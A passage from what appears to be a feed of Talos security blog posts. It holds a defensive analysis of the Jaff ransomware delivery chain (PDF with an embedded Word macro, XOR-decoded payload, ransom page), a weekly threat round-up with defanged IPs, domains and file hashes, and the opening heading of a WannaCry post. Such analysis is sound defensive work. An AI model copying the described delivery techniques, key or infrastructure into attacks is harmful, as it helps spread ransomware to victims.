    Even though certain elements of each campaign differed slightly, with different XOR key values being used, they all exhibited common features. The email campaigns that were attempting to distribute this malware were using standard spam characteristics. The subject lines were mutated with a random string of digits but started with either "Copy_" or "Document_" for example "Copy_30396323" and "Document_3758". While we were monitoring these campaigns, we saw multiple campaigns being launched, each with slightly different themes. The body of the email associated with the initial campaign was blank with a single attached file named "nm.pdf" an example of the campaign is shown below.
    Figure A: Example Email Message

    As can be seen in the above screenshot, it does not appear that the attackers put any significant amount of effort into the creation of the emails associated with these campaigns. A bit later, we saw a subsequent campaign with an email body that contained the following text:

    "Image data in PDF format has been attached to this email."

    In each case, the file attachment was a malicious PDF document with an embedded Microsoft Word document. When victims open the PDF, they are greeted with a message in the body of the PDF, which will then attempt to open the embedded Microsoft Word document.
    Figure B: Example PDF Attachment

    Similar to what we saw with recent Locky campaigns, when the PDF attempts to open the embedded Microsoft Word document, the victim is prompted to approve the activity. Requiring user interaction to continue the infection process could be an attempt to evade automated detection mechanisms that organizations may have deployed as no malicious activity occurs until after the user approves. In sandbox environments that are not configured to simulate this activity, the infection may never occur, and could result in the sandbox determining that the file is benign when the reality is that it is malicious, the infection was just simply not triggered.

    The PDF contains the following Javascript, which is responsible for opening the embedded Microsoft Word document:
    Figure C: Javascript Within PDF

    Clicking the OK button causes the PDF to open the malicious Microsoft Word document which looks similar to what we have grown accustomed to seeing from campaigns like this one. As can be expected, the user is also prompted to Enable Editing in order to view the contents of the word document. One thing to note is that the malicious Microsoft Word document contained two pages rather than just one like a lot of maldocs.
    Figure D: Example Malicious Word Document

    Once the malicious content is enabled, the Microsoft Word document will then execute a VBA macro that functions as the actual ransomware downloader and will attempt to retrieve the ransomware binary to infect the system.

    The VBA Macro contains multiple download domains which are separated with a capital 'V', this gives the malware multiple opportunities to download the malicious payload from multiple sources.
    Figure E: VBA Downloader

    The URL used to download the Jaff binary is very similar to what we are used to seeing from Locky as well.
    Figure F: Download URL

    The binary blob downloaded above is then XOR'd using a XOR key embedded within the maldoc, we observed multiple XOR keys throughout this campaign. This is found within the Module3 of the VBA Macro, with the XOR key being 'd4fsO4RqQabyQePeXTaoQfwRCXbIuS9Q'
    Figure G: XOR Key

    Once this XOR process has completed the actual ransomware PE32 executable is launched using the Windows Command Processor using the following command-line syntax:
    Figure H: Executable Launch

    The ransomware iterates through folders stored on the system and encrypts them. The file extension associated with this particular ransomware which is appended to each file is "jaff". The ransomware writes a file called ReadMe.txt into the victim's "My Documents" directory that contains the ransom note.
    Figure I: Text Based Ransom Note

    It also modifies the desktop background as can be seen below:
    Figure J: Modified Desktop Wallpaper

    It is interesting to note that the instructions do not appear to instruct the user to make use of any sort of Tor proxy service such as Tor2Web, instead instructing the user to install the full Tor Browser software package in order to access the ransom payment system. The Tor address being used across samples and campaigns also does not appear to be changing. Visiting the ransom payment system results in the victim being greeted by the following application which requires them to input the decrypt ID listed in the ransom note on the infected system.
    Figure K: Specify Decrypt ID

    After entering the appropriate ID value into the website, the victim is taken to the full instruction page that specifies the ransom amount the attacker is demanding, along with instructions for making the payment.
    Figure L: Ransom Payment System

    It's interesting to note that the look and feel of the ransom payment system looks very similar to what we have seen from Locky. In this particular case the ransom amount being demanded was 2.01117430 in Bitcoin, which at the time of this writing was approximately $3700, which is significantly higher than that demanded by other ransomware families operating across the threat landscape. In looking at the bitcoin wallet specified on the ransom payment server, we confirmed that there are currently zero transactions associated with this wallet.
    Figure M: Bitcoin Wallet Transactions

    Campaign Distribution/Volume


    Talos observed over 100K emails (so far) related to these new Jaff campaigns. This is a significant rise in ransomware delivered by spam for such a new actor. Their immediate relationship with Necurs has allowed their spam campaigns to reach impressive volumes in a very short period of time. The initial spam campaign began on May 11, 2017 at 0800 UTC and consisted of roughly 35,768 messages all containing the attachment "nm.pdf". Talos observed approximately 184 unique samples within this spam campaign.

    Talos also observed a second campaign that began overnight consisting of approximately 72,798 emails. This campaign began on May 12, 2017 at 0900 UTC and was observed to be distributing approximately 294 unique samples. The attachment filename associated with this second campaign was "201705*.pdf" which functioned identically to the initial campaigns we observed.

    Is This New Locky?


    There are certain characteristics associated with both the campaigns being used to distribute Jaff and the C2 traffic patterns it uses that are similar to what we've become accustomed to while monitoring Locky and Dridex activity across the threat landscape. However we are confident that this is not simply a new or "retooled" version of Locky ransomware. There is very little similarity between the two codebases, and while it is possible that the same actors who once used Necurs to spread Locky has switched to distributing Jaff, the malware itself is distinct enough in nature that it should be treated and referred to as a different ransomware family altogether.

    If anything the reason this can be considered the 'new' Locky is purely due to it's rampant appearance, similar to Locky it came out of nowhere with a huge bang, it spread via email malspam primarily, it leveraged maldocs, but traits of a campaign are not used to determine if the malware is the same. This is a new piece of ransomware with a significant effort having been put into the codebase, the infrastructure and the volume. However, that does not make this Locky 2.0. It simply makes it another, new and aggressive adversary pushing their ransomware product to end users, this should be considered, for now, separate from Locky.

    We've now seen that Necurs is being used to push Jaff in the form of multiple high volume spam campaigns. We will continue to monitor this as we do with every email based threat to determine whether this is a fly-by-night occurrence or whether this ransomware family will continue to infect organizations who are not properly protected.

    IOCs

    Email Subjects

    Copy_String of Digits
    Document_String of Digits
    Scan_String of Digits
    PDF_String of Digits
    File_String of Digits
    Scanned Image

    Attachment Filenames:

    nm.pdf
    String of Digits.pdf (Example: 20170511042179.pdf)

    Attachment Hashes:

    A list of attachment hashes associated with this campaign (PDF & DOC) can be found here.

    Binary Hashes:

    03363f9f6938f430a58f3f417829aa3e98875703eb4c2ae12feccc07fff6ba47

    C2 Server IPs:

    108.165.22[.]125
    27.254.44[.]204

    Distribution Domains:

    A list of distribution domains associated with these campaigns can be found here.

    Conclusion


    This is yet another example of a new ransomware variant being unleashed on the world. This occurrence is becoming far too common and shows why this is such an attractive avenue for miscreants. There are millions of dollars at stake and everyone is trying to grab a piece of the pie. Jaff is being distributed through a common mechanism, Necurs based spam. However, it is asking for a fairly large ransom of $3700. The question is at which price point does it deter users from paying. In the future we will likely see adversaries continue to try and find the sweet spot, maximizing profits without sacrificing ransoms paid.

    In today's threat landscape ransomware dominates and is being pushed onto systems around the world in every way possible. With the large scale decrease in exploit kit activity its likely going to continue to be heavily distributed through email as well as being delivered as a secondary payload when adversaries manage to penetrate a network or system, in the case of threats like Samsam.

    Coverage


    Additional ways our customers can detect and block this threat are listed below.

    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    CWS orWSA web scanning prevents access to malicious websites and detects malware used in these attacks.

    Email Security can block malicious emails sent by threat actors as part of their campaign.

    The Network Security protection ofIPS andNGFW have up-to-date signatures to detect malicious network activity by threat actors.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella prevents DNS resolution of the domains associated with malicious activity.

    Threat Round-up for May 05 - May 12

    $
    0
    0
    Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 05 and May 12. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

    As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

    This week's most prevalent threats are:

    • Doc.Downloader.WithMacro-6310867-0
      Office Macro Downloader
      This is an obfuscated Office Macro downloader that eventually leverages Powershell to download a malicious payload executable. Typical object interactions are obfuscated via the WITH command.
       
    • Heuristics.W32.Parite.B
      Virus
      Parite.B is a polymorphic file infector. It infects executable files on the local machine and on network drives.
       
    • Js.Downloader.Nemucod-6311824-1
      Script based downloader
      Nemucod is a JS based downloader that continues to be highly used by several spam campaigns & active exploit kits, oftentimes as a stage toward dropping popular ransomware on compromised hosts. This particular variant relies heavily on hex character concatentation ∓ naming conventions consisting of randomized 0, o, or 0 characters.
       
    • Pdf.Tool.HeapSprayHeuristic-6301967-1
      PDF JS Heap Spray
      PDFs leverage embedded JavaScript to exploit vulnerabilities or at the very least gain access to additional functionality provided by JavaScript. Typical exploitation techniques require a heap spray where JavaScript is used to copy the same data many times throughout the process' memory.
       
    • Win.Dropper.Elex-6310653-0
      Dropper
      This is a dll which is downloading files from dga domain using powershell scripts. Observed installing adware Elex, but can be others. This dll is containing also indicator to perform operations on raw drives. Persistance is ensured with service installation
       
    • Win.Trojan.Generic-6305879-0
      Worm
      Gamarue is a worm that can spread via removable drives, spam emails, and exploit kits. It contacts several malicious domains, and can be used to install additional malware on the infected computer.
       
    • Win.Trojan.Nanocore-5
      RAT
      Nanocore is a .NET Remote Administration Trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, files, recording keystrokes, and so on.
       

    Threats

    Doc.Downloader.WithMacro-6310867-0


    Indicators of Compromise


    Registry Keys
    • N/A
    Mutexes
    • N/A
    IP Addresses
    • 185[.]165[.]29[.]36
    Domain Names
    • N/A
    Files and or directories created
    • N/A
    File Hashes
    • 009ea577f9f7c8d311b96051c3a6e4fe288647fe4122c2fb0c14240565097012
    • 015f06d82006879a5e040e913f8ea91ed5ad01249f753cfbf1888daeb19073e3
    • 01dba2caf8c50e171d4cfb45b788b589af06f4a467174325c88f200ca7ca9198
    • 0212c580c27761eddea2af38b0a0c1fb9b32789c5574ea7a23f8184570d8dfb6
    • 03aaf18f3a59fb063622511d6b441999ff90c06742911419052251ec320146b8
    • 040e61e10a7a85c23041c1f0e4635dd2ea9307787eb17e88f80372529e9209d5
    • 06e4b3a33127ddd8ff0157fc0ba1d2d24a8f26ed1a149b4388c01d30350c0ccb
    • 072e99a20f62ec2d713db7e088edac0fcdb90a77f0b10aacd7d0e549d694f0ed
    • 0a428729361a8a712cbfd3d8574b234306c12c32b327d3cd207fa188460b1e3f
    • 0a7922eb74e6139a08fa8735a87cc47fc62c1f6325aadbac2bc82c2981f2ada1
    • 0b9e0425aea9565b0307a322976f77edc6802e443cf5f62f724fec4ad83a9d28
    • 0bacdef1c789dde9662570062587098b7c693bb7be89c0a22b824aa5fbff6056
    • 0bfc71f69f2bd4db2ae9fc900e11509852e1eb8874f39171287e86bb7284868e
    • 0c7f5c69e828c88778314be34c3468ab9a2bc9705cba727bb3c89832c3f91113
    • 0e9246ff490f54d156cc3426e434980bb98a81935f1c9666a93237428b8e0ea0
    • 11769cdaf3c210df174702803fbc4afa7b2cc20a27ec30ed0e4f81118a66de10
    • 11fe367d79f104632d9452027a7377b4c51fc0f43f32d7a6fe73f34fc2cce508
    • 11feca2c6b6d0be07e01bbaa910ef8a44c81f89ad1dabcdc5eeddb37ff12d854
    • 12e7c347609f1b2aea12e47f12d15df579c22162a49338977d4694dad7fff028
    • 1333e3e5be8cc510e33c609a7080764b12cab70e5ddbb57167309f15557edcae
    • 14cc6de1dd265d0943a96b4852e6f8c5828f636131333d0c19b2dc5f7a0ca1ff
    • 15bafa0d6de0681cd079ae866c4ed4f1c9917ce96261215564c8f0029f9675e8
    • 177477fcf8963dbef8e22bd32f7f08e4b103af89ba7f3e7a4a997513e1532629
    • 17abb7ca3e200e5c7965ffee65629d3d113717bd858377948e577200e6be11b7
    • 1997e3d6ba77ea68160b88c083aca9bca8d8bbf8e1191e86c1660f7a4b038f93
    • 19d6fc360c1af923e44f173989591f382ab965767802bc54a2df875a10ca4e38
    • 1a50f4767495978a5ca9e34fcde61a74657e04d12b04bac60c0b0b6aac26c588
    • 1b6a81db9bf395f8f80e1d23b143d5ac049af16878f66ecd3874f4cda406836a
    • 1f9a0e385cbce520988e24bf1b95b4cd7976d46637864e5fb20548068b3cc4eb
    • 220791a76a3befad1dd9e71a8664ab7546ee1cc98a9b061abb2cfd577b8bf55b
    • 25291ca354bd11e6864e84eee74b3a271541e4aa6e8479f3cafe13210b8bafcf
    • 28b343fc742da18b7ffc9a2e5e9c49b8f54cb6ac724849ccb56b4d079088d1c6
    • 2a7eae250d89a5fdc9ee3acb57d1f068eb5b1ed06aa48c9093d095c3187271e7
    • 2b3ea22573384712690f76dbc939935a848a739f61a7c69e92f11b4eb77bbc41
    • 2c960ecfc9cb060bf73cff44accc258f47164c3b7b497bdf3d02f7088bce7d7d
    • 2e0b71ae5e202e569ecfa9731f58376e1d24a5dea725e4ef2eda64939dfba226
    • 2f0220eb391f691e51b2afc724d9cd04a9f869e34fe9e8c715e864f13546136e
    • 2f0877a8ebbad2f4e11709da5a99453b812a86ba0e5502a6b0791b856fc9dc6c
    • 2f571cc5b3f708e3a6da99c9d61f99d0230052e9a0cc483644044f92537a7ddf
    • 30224c91115b5c4212de3dcb8cbb412b59084d8bea1ea9f54525de0a07362b68
    • 30a37e174b9a8433ca9befda236c985daa5b92aa8cd078e8f6e033e61914caa3
    • 31819465f95180892f68afb2f4bda5eaafcb1ac7138fcdd0e91e951eeb307e47
    • 33242ab139dfef3cd6f6e2938d54737c5efcdaf00217e1c5b49c2dc5618449ec
    • 34ca6fe49ec7c5b318e55183d09c350af5b418209558ca1ff6bdc53034fcaced
    • 358782ef63e14ff6606fc4e1b91da61ba19383e403fab6997cf5d2b000d5136d
    • 36d1b267808d306d96ff40520b1cd1f04b861847313dd0ea60fb5bf764843b21
    • 3736940527681c6c0daf9c25fdc1807868bab9c339a61a7ed88f8c7e335128f3
    • 37f39f494673dabdb49c254a02aeca1dd350f8ea828b928cd4d8f42e6c6cd264
    • 37fa50440f8950df0d0dbebe2b052925d9014ab85c3c8b62e3d9fa49f327cc41
    • 3ab653f63c43209910645d6d87d8b60419ace960dd16e275f407cf46bce0b8b8

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid




    Heuristics.W32.Parite.B


    Indicators of Compromise


    Registry Keys
    • N/A
    Mutexes
    • Residented
    IP Addresses
    • N/A
    Domain Names
    • N/A
    Files and or directories created
    • \Documents and Settings\Administrator\Local Settings\Temp\jnj1.tmp
    • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mhbD.tmp
    File Hashes
    • 00667eb42299cf767fd996961e426f3af3471c71f1e612ec2d832576289077d2
    • d8e6807fb1b2ca4d3e9ce8c15415839ed8e9a57cfe7d3e362d0e225de436eb77
    • 5a16d398170bc582ddc864b35271526defce211dc9026739fdeca9260414f36a
    • 742fff7851b87b91583f54c2c70438ede8af603aef3e3897e5792665b382b0bb
    • 3107785dfb03aa0a1b072ab4a9de383733cc53724f94d04647129848a2418d79
    • 415d459846a0f9453963b0474d6a6ad877c7c25c72e445b0f6e6e585cd5b400e
    • 2c4657c53467b77fa8c007468ce756f623e302294a288782041c3fd225828af4
    • e67254d17730ec06704cd78f65182380f02f6e09997b2d9fec815d7209705965
    • 50ee4a9db6b125b5b57693f2aeb622c3133811f31e6b81034f3bcbec5af7f6f9
    • 644d71edbc489214fc98d55504059da222f888169363a5d7d21e44ddf1d825c9
    • a176ecdb644b79d68cd721a7b417edb425a88e9cdfec6c490b194056e3a47024
    • 8f0419896c6b0dd5bdb2748777f3e96c4bbfb7f7e96ae88fecb025607fa2d194
    • 9510fd8c732f0ffd693931090c326ebaf2ba12f2b2c6ea53225d932adfc4bd22
    • 0280366ea9ccf3412e0eb354b03c2ddb9ebf5a60eb236a0aa6a4334033b8d267
    • d31e56c10e62524c241d878b4ab94eea6193bfcd22f4b89f3fd8beb9c55cc9da
    • d2674afebf388fc5b068288df275554b098b8c2ff3bc93606025a273f5c09670
    • de0210ad1d7c25c124b110ef3fed6386ff25a311e35ea301d83bf7be9eecc23c
    • 23c81c28545fe91270f72dd2463609ecac4ba8163ebadabce343f18425a08929
    • 2345aab3ecebc954de2839fd61501f9fa8fb886566f85f88be535ecdbb263d2a
    • 0c6478931f2e3edb41d5b6cca8d4f033864a033e084323762a0cc0714b62f128

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid



    Js.Downloader.Nemucod-6311824-1


    Indicators of Compromise


    Registry Keys
    • HKU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • 37kddsserrt[.]pw
    Files and or directories created
    • N/A
    File Hashes
    • 15a37811fe59536bfee4155c41b94911d9d507beaaff2fa673dd1da3e1f369e0
    • 1a7e222d39aef7ac4d8006503b46145e127ce6eca82eb75c22163a73c40e27b3
    • 20ffb283d1af44cb42afbee43c2b386021e7dedb9c59c1d5a95ac3e05fce9742
    • 2f80a68b8603b77c2f138e1a6c082e1308dba1d1e7c7e4d91b25baab67251d0a
    • 2f917ae9ce62698dddc07f55bafc3f95937ba2cac1f75e5e2678a1163d175e2c
    • 3ba9904b8ebd1b81c406293a55cb1ccac03ef574bbc8f3a2ecaa726930f75b7c
    • 441ab6cd707bb4a485395edf30b7b1eff84cc02f2cbd0f6a83c8a269c72c9da7
    • 4d8d2444d77fc8c802be80fa93e317316bd86f3f9ee2699d971c89f36a4cbfd3
    • 92649f778b58afd71bc8f500465489a67c16be7789f5aff8ffcedb6216679ff2
    • 983446fa82305c52ff87a76be94a75ae1c7c10c6c43a6481bd4db8b7e679eddd
    • 9c74de5f43b79fd44843126716f8c27b1dc4f33dff779fe2cd7a5eded23c4dd2
    • a655770566e3c0783b3fbf8d9be3fb713d9e6380ec3e5a9aef5881f761e8925d
    • aec59a27af9c7ca54247666338ad0a6a0d74a23ee0e6bd7c33be76b7872a49ee
    • baae74e6a153bb597d8ceb81f22508c55d8697fb748502708c9666d78d53a4c5
    • d0f0a5c540a3e68f417590cb4f27a6f9da4401b2b0e71ccabe6f46d0a7e6135f
    • d13ffcf550abe6033977d5730babf4dff4358487d35d646c043683515f39e89a
    • e290216a1ccb5561d17e1d0d681eb27e7c301d774fdb275fbb1292ba98fa137a
    • e4acd53b4ecb0bd3cd0e7a534d4d0a80fd221bbb73c199ffa3f44019a1989a55

    Coverage


    Screenshots of Detection

    AMP


    Umbrella




    Pdf.Tool.HeapSprayHeuristic-6301967-1


    Indicators of Compromise


    Registry Keys
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
      • Value: Collection
    • <HKLM>\System\Acrobatviewercpp304
    Mutexes
    • 2AC1A572DB6944B0A65C38C4140AF2F426c714578B0
    • 2AC1A572DB6944B0A65C38C4140AF2F426c714574CC
    • 2AC1A572DB6944B0A65C38C4140AF2F426c71457750
    • 2AC1A572DB6944B0A65C38C4140AF2F426c71457468
    • 2AC1A572DB6944B0A65C38C4140AF2F426c714574A4
    • 2AC1A572DB6944B0A65C38C4140AF2F426c71457490
    • 2AC1A572DB6944B0A65C38C4140AF2F426c71457828
    IP Addresses
    • 85[.]13[.]129[.]180
    Domain Names
    • www[.]osterkirchengemeinde[.]de
    • www[.]evangelisch-in-rath[.]de
    Files and or directories created
    • N/A
    File Hashes
    • 0ed5bb2ef055843c083d2316999e99827a4ff8bbc143c88a38cc413f9c2c116e
    • 4cabe4eaf54b986b6f2170be4e89d98aed85c4012d64c8b4de0f1a74260228de
    • 9c85ae448c23c19b4049e5290453027f81681348a28b5f3859aad247855db881
    • afaaa1de8842a8e4d57c856cfa48d8eaef4177ba0842431c5108eb65e8b028f1
    • 1ef663a739551ca8e3b13ec5d174025a020ca0a9973ebf161532518a4d8c757f
    • 706672cad725b4e660d5c5d49d07ac40ecda3f063ba206bf1631ef70e1677b2d
    • 0a943757893342c4fa59b3f27b7d5495be02b19c748880fce980e17573ca3603
    • 4675f673f32f990cdd142485944cf45578aa44777905ff4f69b79bfca478f78d
    • 97dd140d08ad59d23511cd8c693e228c1873f980082a03bc7e6882ec66286cda
    • 95e247c1d3e2c57e290333a3d3ddca9d4ec10df89c65a7b2bf6dcf3a149d5707
    • b74b8beb8461f677edd2c3668cd2b1b75e10a4ad478dd3f5ab6e0e0ce411173d
    • fee4c7f0f121a24026274b75b230e8320153ca6b04398d62e727992dc7805cbf
    • 6269e027e2e35a3cc05683a26be9d3912b71821aed363ccfe03fd6714ba62bf9
    • 87d75c307f059c7c6b9dae22aa672eee59cbba102fb836157daa4022f4aa2daf
    • e708eeff27d67902a1bf69fb5e915b3387e8f978aec3381564bf216614f7fdb2
    • 10258a93f571c695996c68ed138af3cfe27599d972ece06d8ff83c41d8feea55
    • 22418e0da375bbd39ee22a31b439d943331fbf93090656e0228ba090a5411ced
    • 19c8b5e940dd58be7d922b82803551f33edfdd5b99b51f975572672355afac24
    • 4c357d0e23b940794e4fd02db568b791d4bbafc3c01f13fed36746c3a8ff7389
    • 5246ba3e5adf83a61d531b71010ee97ce95bb0f576de2e5f17d9d9335bf60b5f
    • 94a7a438d7583a89eb1c2d36a2c425d2bcebb46da9003881ca56aff7693db25d
    • 78d4ccaa8d70737c6c414e22f2fffbdc4f50ce2669d355cfc306e9765041c49d
    • 774b078fb180647b85b054f1402b593b418f46cea143ec78bfee33b8549d77eb
    • 6b54c11ba12507c70f28b1217ac12b7ffac7565269e49679358e4a6171e0b09d
    • e40981cc4fb3302bba6843222c7e2bec31128aed4307247a228656d09362640d
    • fb5cb1b158ac996ff9e2181eec27f5e165ee15b7210dc3aa7e1386dbe3fb4c02
    • ec87f2b3b3e506e4b56f6b07b6e5287b6907fe692957990581bd5855361f6548
    • f211816b7459d3f032cf816f8d218117b19d2b3936b7496e7d7f8ba25745a5a9
    • 3d84331388d5ff3bfcafbe9ac21342530028e6697e186a8f2aaeeb91dca07ae8
    • 2b8bf40b0c7a7a4c17687d997e2382c701a38704c6218e8bbd23132c755144ba
    • 35f378fadf4d4a483dd4fedbc381d3409718896c4d77a2844509f1fc54eefc48
    • 734a5745a213cea15d8136aa19134a20a128bfc946158ae3f62293e83cbc9be1
    • 97f27903b0514a185be1953a4723b41397cefb323895341976e32303a6c40496
    • a88324345da77b1bb039aae33cfaa276dbc2a23a9366ff343f7d4cc814ebed10
    • a5fc5fbebb46342d1dd34352227bfb14f95bf942a889d48503b0b70a60ade4d4
    • c7f9bd64a9ef18d38575a240490bc84e477397d0ceb92a3fd50b3c54c9e54ed6
    • de56b4596f74c18f6bf6214ab4e65f77116b310e8a29e7a311068e0d2e213ab2
    • cc218b74a0dcee14ef0ef2945e24c3131fc6ec0e686f0ae4d829884914eaf67b
    • d19e62d473c5ed40bc68c46cc3a7bebca0b88f7cb030dce05b2e2c9b65bc9cf9
    • 1a069aab9f5b2dcf80ba50bcfb2b19384f1dc366e08d2c2e6d93305340cc69e2
    • 1c4e83094a1f5ae3cb209289ea8a88610b54703669537e07acbf329c0b6dcfb1
    • 0097500439d1cdfa7201438e2b833ab9aae853d2055be97f555745d22bb4f2dc
    • 10e4a16f1dc67f56f2fb8c4e9c77f524dd8e75d3c4da16a310a14655e8f9f350
    • 095b45f74868dccbf0c16861d45d664d59207be569a0bbff61dedb6b64995f3d
    • 219e6afff26d23e1b86be14ec89573f2c212dbcb825e11fbdbdad4e6788c86b6
    • 577ed1dad1ab726daa5fc3a2efdcbd2c737d58c79f9ddd5aa2300876a9b66fc2
    • 8e95f4bfd0e6b15b7ebcc5b755419f14fae4acbdf000620be1ed4340259801a7
    • aeab75acf64b90cb741e81399ea61f31c86c2ad54ad156c6218f4cfe6b6e3dbf
    • 1113a806123f549bcab408286f05f615906bbe93016bb4678899101c533cb4eb
    • 1a303ada7458d80307c454c2dc045f169f5623e0b0282ca84ae4682c03ea41a1

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid


    Screenshot



    Win.Dropper.Elex-6310653-0


    Indicators of Compromise


    Registry Keys
    • <HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
      • Value: WinSAPSvc
      • Data: Parameters
    • <HKLM>\SYSTEM\ControlSet001\Services\WinSAPSvc\Parameters
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • dhxx2phjrf4w5[.]cloudfront[.]net
    • d4c04g24ci6x7[.]cloudfront[.]net
    • dc44qjwal3p07[.]cloudfront[.]net
    • d3i1asoswufp5k[.]cloudfront[.]net
    Files and or directories created
    • %AppData%\WinSAPSvc\WinSAP.dll
    • %SystemDrive%\winsap_update\Do24_Proxy.exe
    • %SystemDrive%\winsap_update\WinSAP.dll
    • %SystemDrive%\winsap_update\wsc.dll
    • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\cspE.tmp
    • %SystemDrive%\winsap_update\winsap_cf
    File Hashes
    • 9e509317500fbc908cb5cb6a064abcbbf98eeb6ab0825fa5f962ad460674f263
    • 540af140928834a0e904d897408e6ceb118aec79835f0050b504541688b028d4
    • b00e14ffa5a1995524e938c8c89bfd4f278ffb7e98ef738412cbb0674bc0966a
    • 6ffbbfd27387e2a941293ac752b18ef9baa5801f07a3be4695ae465fd8164846
    • b1e726e34c0920f8e394af5327f86383ea014d072809f31c409e6d8428629189
    • b580b561468763a4ccdd66d37df929fe5b31f615e75dfd8b537eaed1c85213d3
    • 632d67e4b439fc0fef2a430b885ada2687e8e0af41c8cf74b37a70e809f7dcde
    • 2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b
    • c640da31b32d736f784eee0c5adf742cd607388ac3772097b1e4bb184a9839cf
    • fd708e0fc599cc3c78f6af9f56af9da466f7f46984d3be5ecc678177a752e027

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid


    Umbrella



    Win.Trojan.Generic-6305879-0


    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
      • Value: IntranetName
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
      • Value: AutoDetect
    • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
      • Value: IntranetName
    • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
      • Value: ProxyBypass
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
      • Value: UNCAsIntranet
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
      • Value: skypee
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
      • Value: ProxyBypass
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
      • Value: internat.exe
    Mutexes
    • 4030631218
    • lol
    IP Addresses
    • 23[.]253[.]126[.]58
    • 166[.]78[.]145[.]90
    • 208[.]100[.]26[.]251
    • 104[.]239[.]157[.]210
    • 65[.]55[.]50[.]189
    • 134[.]170[.]58[.]221
    • 224[.]0[.]0[.]252
    • 192[.]42[.]116[.]41
    Domain Names
    • imageshells[.]com
    • sonic4us[.]ru
    • bighecks[.]net
    • www[.]yahgodz[.]com
    Files and or directories created
    • %WinDir%\Skypee\skypee.exe
    File Hashes
    • a53102b5cf8a0d9e395d239b7e3bcd810602d9860a6c013d98eb1260a6e556c1
    • ba811b3bdfd1a0a931327fad9ad2c093e18edf17843df225fef862c8092bb67d
    • c7b096cbc62fb44ffa9d61cfd829c6ba601996035d91635753cdfd676999bb0b
    • 9a62ff51346d88251f6ff3bb06e287adc96f9b25def1ce9fca61b8eae6ceaf31
    • 615cc70cdf50d8b217dd54f97d41f58bb3567d9bd49c09bb46d9a945239d9834
    • adc844ee16010d8333770d1eb59ced6c15e161ca08a9fd8b3540c16bfd4dde51
    • 2219c33bee232930783a85f091d1931b70d079300170699e5b9f3f958d8a504c
    • dd3991e7cf0239c99fbebab008cd8e2b4d1748f2506ce52a9dfe89049f84c25d
    • d25abadcad1e43d972828f74f6fcc8945d716193c20c966dac04458c56b16cc0
    • 7b1e6b8f13e87cdcc61c9924ccd82a9a11e250495261fe65ef9bc0cd658c0cba
    • 352485d048b952fb502e967c7504113dcaa65b6bd7d90b4ef1553300c2e1cd10
    • bf0a13f37cda4d33191115e22067a70a60ed5e8a47fe64714df6f7c7379229e8

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid


    Umbrella




    Win.Trojan.Nanocore-5


    Indicators of Compromise


    Registry Keys
    • N/A
    Mutexes
    • N/A
    IP Addresses
    • 95[.]136[.]188[.]213
    Domain Names
    • denialfx[.]ddns[.]net
    Files and or directories created
    • N/A
    File Hashes
    • af74e9d03183e787b7be30e5b8cdeb2caab2efed50ff100b783fa718f5091f17
    • 1092399e3f24750b7dcc6bad8ab83011ad36dfb96b0d7096d5589a1c7aeab4f3
    • 1b672136fb4aed1cf243d8a60e5f16f22cb7419e3b5bc874d572e1b64e714e9c
    • 0d798d302878b8f8860ca469239d18dbe41e6df7fe3e6643783eeb4c8a2f8f84
    • 58592983390f2aec8659a7d3750bb11c236fa747408b96e9ec00558c4d7783d8
    • aee3bb0f4210c2821c379ba88f06070debef705a3cf14ba3f20a25f9e69d57bc
    • 5a08c426b6741e3ecea4b46120f4aaa231aa3718c51e0c026a5a6811b75ee2ca
    • 8738e8f913de386cc8e38acab178d73778a2e7e6fb9b9d93654cc965be5d4d2c
    • 3e77823a066203d327fe020185852b38d6c7aecf28fa84907cd31d897a3ddb6d
    • 9f1c2a1a9068fb232fd072f8c02b88c70303f53f1d816a42902263d2f4ee8103
    • 93b627ee36e381a3fe557fc3ac43e5734bcec288a1b96ab84c77c6565ead8c18

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid


    Screenshot

    Player 3 Has Entered the Game: Say Hello to 'WannaCry'

    $
    0
    0
    This post was authored by Martin Lee, Warren Mercer, Paul Rascagneres, and Craig Williams.


    Executive Summary


